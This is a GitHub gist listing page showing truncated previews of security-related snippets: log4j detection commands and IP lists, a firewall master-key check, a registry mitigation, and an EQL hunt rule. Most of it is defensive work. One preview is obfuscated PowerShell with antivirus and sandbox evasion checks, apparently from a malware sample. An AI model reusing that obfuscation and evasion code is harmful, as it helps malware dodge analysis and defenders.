Skip to content

Instantly share code, notes, and snippets.

Listening to meowzek

Dan danzek

Listening to meowzek
View GitHub Profile
LeeHolmes / Get-TwitterThread.ps1
Created Nov 15, 2022
Recover your Twitter threads from your Twitter export data
View Get-TwitterThread.ps1
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
$currentTweet = $currentTweetJson.tweet
if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
View gist:352b309a576a1654c6588eb9dcba6d9d
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
rqu1 /
Last active Oct 29, 2022
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
class PanCrypt():
theevilbit /
Last active Apr 25, 2022
Download All Apple OSS Tarballs from Github
: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
blotus / log4j_exploitation_attempts_crowdsec.csv
Last active Jan 11, 2023
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
View log4j_exploitation_attempts_crowdsec.csv
ip status country as_name validated RO Unmanaged Ltd validated KR Korea Telecom validated CA OVH SAS validated US PONYNET validated DE netcup GmbH validated ES Orange Espagne SA validated DE LUMASERV Systems validated PT Vodafone Portugal - Communicacoes Pessoais S.A. validated ES Orange Espagne SA
SwitHak /
Last active Feb 2, 2023
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Neo23x0 /
Last active Jan 31, 2023
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
wdormann / noappinstaller.reg
Last active Dec 14, 2021
Prevent the ability to click on a ms-appinstaller: URI for the current user
View noappinstaller.reg
Windows Registry Editor Version 5.00
"URL Protocol"=-
View EQL hunt for Potential Macro on close
sequence by with maxspan=1s
[process where event.action : "creation_event" and : ("winword.exe", "excel.exe", "powerpnt.exe") and
not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
process.args_count >= 2)
] by process.parent.entity_id
[process where event.action : "termination_event" and : ("winword.exe", "excel.exe", "powerpnt.exe") and : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
] by process.entity_id
use std::net::ToSocketAddrs;
use std::sync::mpsc::channel;
fn main() {
std::env::set_var("LOCALDOMAIN", "1");
let mut threads = vec![];
let (tx, rx) = channel();